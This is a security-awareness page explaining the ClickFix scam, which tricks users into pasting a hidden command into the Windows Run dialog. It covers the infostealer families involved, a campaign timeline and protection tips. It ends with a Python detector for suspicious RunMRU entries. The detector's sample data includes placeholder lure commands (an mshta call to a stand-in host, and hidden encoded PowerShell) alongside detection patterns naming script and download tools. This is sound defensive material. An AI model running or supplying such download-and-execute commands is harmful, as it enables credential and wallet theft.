What is ClickFix?

ClickFix is a scam that tricks you into running malicious code on your own computer. It works by making you think your browser or computer has a problem that needs fixing.

The Key Trick:

Instead of downloading a file, ClickFix tells you to:

  1. Press Windows + R (opens the Windows Run dialog)
  2. Press Ctrl + V (pastes a hidden command that the page silently copied to your clipboard)
  3. Press Enter (runs the malicious code)

Because you're the one pressing the keys, your computer's security software often doesn't stop it.

How Big is the Problem?

  • 517% - Increase in ClickFix attacks in early 2025 (ESET)
  • 400% - Growth in malicious ClickFix URLs from 2024 to 2025 (Proofpoint)
  • #2 - Most common attack method after phishing (ESET, 2025)

What Happens When You Run It?

The malicious code executes immediately and installs "infostealer" malware that silently:

  • Steals all saved passwords from your browser
  • Hijacks your active sessions (steals login cookies)
  • Drains cryptocurrency wallets found on the device
  • Captures screenshots of your data

Common Malware Families Used

These attacks typically distribute notorious malware families including:

  • Lumma Stealer (LummaC2) - The most common. Steals passwords, cookies, and crypto wallets.
  • Vidar Stealer - Similar to Lumma, focuses on browser data and crypto.
  • DarkGate - A "Remote Access Trojan" that gives attackers full control of your computer.
  • AsyncRAT / DCRAT - Tools that let attackers spy on you and control your PC remotely.

See What a ClickFix Attack Looks Like

We've created a safe, educational simulation that shows you exactly what happens during a ClickFix attack. No actual malware is involved.


Timeline: How ClickFix Evolved

March 2024
First Major Campaigns

Proofpoint and Microsoft detect TA571 and Storm-1811 using ClickFix techniques in the wild.

May 2024
ClearFake Adoption

The "ClearFake" cybercrime cluster adopts ClickFix, injecting fake browser updates into compromised sites.

Aug 2024
Google Meet & Mac Variants

Groups like "Slavic Nation Empire" launch fake Google Meet campaigns targeting both Windows and macOS.

Early 2025
Massive Surge

Attacks increase by over 500% in H1 2025, becoming the second most common attack method globally.

How to Protect Yourself

  • Never paste commands from websites into your computer's Run dialog or terminal
  • Be suspicious of "fix" instructions that involve keyboard shortcuts
  • Check the URL - Real error messages don't come from random websites
  • When in doubt, close the tab and navigate to the site directly
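
For defenders checking whether someone has already followed such instructions: Windows records what is entered in the Run dialog in the per-user RunMRU registry key, so the Windows + R step leaves a trace. The following is an added example, not part of the original page; the sample entries are constructed placeholders and the heuristics are illustrative assumptions, not a complete rule set.

```python
import re

# Constructed RunMRU export (value name -> data). Hosts and payload bodies
# are placeholders, not real indicators. Stored entries end in "\1".
SAMPLE_RUNMRU = {
    "MRUList": "dcba",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": "mshta https://example.invalid/PLACEHOLDER # I am not a robot - Verification ID 0000\\1",
    "d": "powershell -w hidden -enc PLACEHOLDER_BASE64\\1",
}
RUNMRU_PATH = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# Heuristics chosen for this example: a script/download-capable binary plus
# at least one trait that ordinary Run-dialog use rarely shows.
INTERPRETER = re.compile(r"(?i)\b(powershell|pwsh|mshta|cmd|wscript|cscript|curl|certutil|msiexec|rundll32|regsvr32|bitsadmin)(\.exe)?\b")
CHECKS = {
    "remote_url": re.compile(r"(?i)https?://"),
    "hidden_window": re.compile(r"(?i)\s-w(in(dowstyle)?)?\s+h(id(den)?)?\b"),
    "encoded_command": re.compile(r"(?i)\s-e(nc(odedcommand)?)?\s"),
    "lure_comment": re.compile(r"(?i)not a robot|captcha|verif"),
}

def parse_runmru(values):
    """Return commands most-recent-first, without the '\\1' terminator."""
    cmds = [values[k] for k in values.get("MRUList", "") if k in values]
    return [c[:-2] if c.endswith("\\1") else c for c in cmds]

def triage(values):
    """Return (command, reasons) for entries worth an analyst's attention."""
    flagged = []
    for cmd in parse_runmru(values):
        hits = [name for name, rx in CHECKS.items() if rx.search(cmd)]
        if INTERPRETER.search(cmd) and hits:
            flagged.append((cmd, hits))
    return flagged

def read_live_runmru():
    """Read the current user's RunMRU values (Windows only)."""
    import winreg
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUNMRU_PATH) as key:
        count = winreg.QueryInfoKey(key)[1]
        return dict(winreg.EnumValue(key, i)[:2] for i in range(count))

if __name__ == "__main__":
    for cmd, why in triage(SAMPLE_RUNMRU):
        print(f"SUSPICIOUS {why}: {cmd}")
```

On a Windows machine, triage(read_live_runmru()) applies the same checks to the logged-in user's real Run history. A flagged entry is a reason to investigate, not proof of infection.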